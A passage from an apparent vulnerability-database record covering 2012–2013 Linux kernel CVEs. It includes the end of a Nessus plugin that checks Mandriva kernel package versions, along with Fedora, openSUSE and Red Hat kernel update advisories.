(CVE-2013-1860)\n\nRace condition in the install_user_keyrings function in\nsecurity/keys/process_keys.c in the Linux kernel before 3.8.3 allows\nlocal users to cause a denial of service (NULL pointer dereference and\nsystem crash) via crafted keyctl system calls that trigger keyring\noperations in simultaneous threads. (CVE-2013-1792)\n\nThe report API in the crypto user configuration API in the Linux\nkernel through 3.8.2 uses an incorrect C library function for copying\nstrings, which allows local users to obtain sensitive information from\nkernel stack memory by leveraging the CAP_NET_ADMIN capability.\n(CVE-2013-2546)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 does not initialize certain structure members, which allows\nlocal users to obtain sensitive information from kernel heap memory by\nleveraging the CAP_NET_ADMIN capability. (CVE-2013-2547)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 uses an incorrect length value during a copy operation, which\nallows local users to obtain sensitive information from kernel memory\nby leveraging the CAP_NET_ADMIN capability. (CVE-2013-2548)\n\nThe translate_desc function in drivers/vhost/vhost.c in the Linux\nkernel before 3.7 does not properly handle cross-region descriptors,\nwhich allows guest OS users to obtain host OS privileges by leveraging\nKVM guest OS privileges. (CVE-2013-0311)\n\nArray index error in the __sock_diag_rcv_msg function in\nnet/core/sock_diag.c in the Linux kernel before 3.7.10 allows local\nusers to gain privileges via a large family value in a Netlink\nmessage. 
(CVE-2013-1763)\n\nThe __skb_recv_datagram function in net/core/datagram.c in the Linux\nkernel before 3.8 does not properly handle the MSG_PEEK flag with\nzero-length data, which allows local users to cause a denial of\nservice (infinite loop and system hang) via a crafted application.\n(CVE-2013-0290)\n\nUse-after-free vulnerability in the shmem_remount_fs function in\nmm/shmem.c in the Linux kernel before 3.7.10 allows local users to\ngain privileges or cause a denial of service (system crash) by\nremounting a tmpfs filesystem without specifying a required mpol (aka\nmempolicy) mount option. (CVE-2013-1767)\n\nThe xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel\nbefore 3.7.9 on 32-bit Xen paravirt_ops platforms does not properly\nhandle an invalid value in the DS segment register, which allows guest\nOS users to gain guest OS privileges via a crafted application.\n(CVE-2013-0228)\n\nMemory leak in drivers/net/xen-netback/netback.c in the Xen netback\nfunctionality in the Linux kernel before 3.7.8 allows guest OS users\nto cause a denial of service (memory consumption) by triggering\ncertain error conditions. (CVE-2013-0217)\n\nThe Xen netback functionality in the Linux kernel before 3.7.8 allows\nguest OS users to cause a denial of service (loop) by triggering ring\npointer corruption. (CVE-2013-0216)\n\nThe __tun_chr_ioctl function in drivers/net/tun.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure, which allows local\nusers to obtain sensitive information from kernel stack memory via a\ncrafted application. 
(CVE-2012-6547)\n\nThe updated packages provide a solution for these security issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cpupower\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cpupower-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cpupower0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/25\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandrake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"cpupower-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"kernel-firmware-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-headers-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-server-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-server-devel-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"kernel-source-3.4.47-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64cpupower-devel-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64cpupower0-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perf-3.4.47-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else 
security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-02-27T02:30:12", "published": "2013-02-27T02:30:12", "id": "FEDORA:2DA2A20783", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.7.9-205.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763", "CVE-2013-1767"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-02T19:55:59", "published": "2013-03-02T19:55:59", "id": "FEDORA:E955220909", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.1-201.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1825", "CVE-2013-1828"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "modified": "2013-03-11T01:24:13", "published": "2013-03-11T01:24:13", "id": "FEDORA:93F5A20E0E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.2-206.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1828"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-17T01:07:34", "published": "2013-03-17T01:07:34", "id": "FEDORA:D141D21DDE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.3-201.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1828", "CVE-2013-1860"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "modified": "2013-03-19T20:06:30", "published": "2013-03-19T20:06:30", "id": "FEDORA:49FE4218C6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.3-203.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-1828", "CVE-2013-1860", "CVE-2013-1873"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-23T23:58:27", "published": "2013-03-23T23:58:27", "id": "FEDORA:45F8621614", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.4-202.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-1828", "CVE-2013-1860", "CVE-2013-1873", "CVE-2013-1929"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "modified": "2013-04-19T04:59:13", "published": "2013-04-19T04:59:13", "id": "FEDORA:455A22792E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.8-202.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4131", "CVE-2012-0957", "CVE-2012-2372", "CVE-2012-2390", "CVE-2012-3412", "CVE-2012-3520", "CVE-2012-4461", "CVE-2012-4508", "CVE-2012-4530", "CVE-2012-4565", "CVE-2013-0190", "CVE-2013-0216", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-02T20:02:58", "published": "2013-03-02T20:02:58", "id": "FEDORA:8F36120DDE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: kernel-3.7.9-104.fc17", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-1828", "CVE-2013-1860", "CVE-2013-1873", "CVE-2013-1929"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. 
", "modified": "2013-04-11T23:33:52", "published": "2013-04-11T23:33:52", "id": "FEDORA:D33BC210C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.6-203.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4131", "CVE-2012-0957", "CVE-2012-2372", "CVE-2012-2390", "CVE-2012-3412", "CVE-2012-3520", "CVE-2012-4461", "CVE-2012-4508", "CVE-2012-4530", "CVE-2012-4565", "CVE-2013-0190", "CVE-2013-0216", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1819", "CVE-2013-1828", "CVE-2013-1860"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-22T00:20:31", "published": "2013-03-22T00:20:31", "id": "FEDORA:813C021894", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: kernel-3.8.3-103.fc17", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0160", "CVE-2013-1763", "CVE-2013-0231", "CVE-2013-0216", "CVE-2012-5374"], "description": "The Linux kernel was updated to 3.4.33 and to fix a local\n root privilege escalation and various other security and\n non-security bugs.\n\n CVE-2013-1763: A out of bounds access in sock_diag could be\n used by local attackers to execute code in kernel context\n and so become root.\n\n CVE-2013-0160: The atime of /dev/ptmx is no longer updated,\n avoiding side channel attacks via user typing speed.\n\n CVE-2012-5374: Denial of service via btrfs hashes could\n have been used by local attackers to cause a compute denial\n of service.\n\n CVE-2013-0216: Fixed a problem in XEN netback: shutdown 
the\n ring if it contains garbage.\n\n CVE-2013-0231: Fixed a problem in XEN pciback: rate limit\n error messages from xen_pcibk_enable_msi(x).\n\n", "edition": 1, "modified": "2013-03-05T17:04:25", "published": "2013-03-05T17:04:25", "id": "OPENSUSE-SU-2013:0395-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00004.html", "type": "suse", "title": "kernel: fixed local privilege escalation (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4542", "CVE-2013-0268", "CVE-2013-0290", "CVE-2013-0871", "CVE-2013-1763"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way file permission checks for the\n\"/dev/cpu/[x]/msr\" files were performed in restricted root environments\n(for example, when using a capability-based security model). A local user\nwith the ability to write to these files could use this flaw to escalate\ntheir privileges to kernel level, for example, by writing to the\nSYSENTER_EIP_MSR register. (CVE-2013-0268, Important)\n\n* A race condition was found in the way the Linux kernel's ptrace\nimplementation handled PTRACE_SETREGS requests when the debuggee was woken\ndue to a SIGKILL signal instead of being stopped. A local, unprivileged\nuser could use this flaw to escalate their privileges. (CVE-2013-0871,\nImportant)\n\n* An out-of-bounds access flaw was found in the way SOCK_DIAG_BY_FAMILY\nNetlink messages were processed in the Linux kernel. A local, unprivileged\nuser could use this flaw to escalate their privileges. (CVE-2013-1763,\nImportant)\n\n* It was found that the default SCSI command filter does not accommodate\ncommands that overlap across device classes. 
A privileged guest user could\npotentially use this flaw to write arbitrary data to a LUN that is\npassed-through as read-only. (CVE-2012-4542, Moderate)\n\n* A flaw was found in the way the __skb_recv_datagram() function in the\nLinux kernel processed payload-less socket buffers (skb) when the MSG_PEEK\noption was requested. A local, unprivileged user could use this flaw to\ncause a denial of service (infinite loop). (CVE-2013-0290, Moderate)\n\nThe CVE-2012-4542 issue was discovered by Paolo Bonzini of Red Hat.\n\nThis update also fixes the following bugs:\n\n* There was high contention on run-queue lock when load balancing before\nidling, causing latency spikes on high CPU core count systems. With this\nupdate, IPI is used to send notification to cores with pending work, and\nthe cores push the work rather than trying to pull it, resolving this\nissue. (BZ#858396)\n\n* Previously, ACPI lock was converted to an rt_mutex, leading to a\ntraceback when scheduling while atomic. With this update, ACPI lock has\nbeen converted back to a raw spinlock. (BZ#909965)\n\n* Fibre Channel (FC)/iSCSI device state was set to off-line and after a\ntimeout, not set back to running. Such a device would not come back online\nafter a fast_io_fail or timeout. With this update, an explicit check for\nthe device being offline has been added, and the device is set back to\nrunning when re-initializing, allowing devices to recover after a failure\nor timeout. (BZ#912942)\n\nUsers should upgrade to these updated packages, which correct these issues.\nThe system must be rebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:22", "published": "2013-03-11T04:00:00", "id": "RHSA-2013:0622", "href": "https://access.redhat.com/errata/RHSA-2013:0622", "type": "redhat", "title": "(RHSA-2013:0622) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}